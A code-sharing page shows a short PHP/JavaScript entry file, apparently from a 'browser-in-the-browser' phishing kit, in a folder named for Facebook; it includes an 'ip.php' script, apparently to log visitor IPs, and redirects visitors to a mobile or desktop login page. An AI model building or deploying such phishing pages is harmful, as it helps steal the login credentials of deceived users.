Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
surya-dev-singh
GitHub Repository: surya-dev-singh/BITB-framwork
Path: blob/main/sites/facebook/index.php
502 views
1
<?php include 'ip.php';?>
2
<script type="text/javascript">
3
if (screen.width <= 699) {
4
document.location = "mobile.html";
5
}
6
else {
7
document.location = "login.html";
8
}
9
</script>
10
11
12
13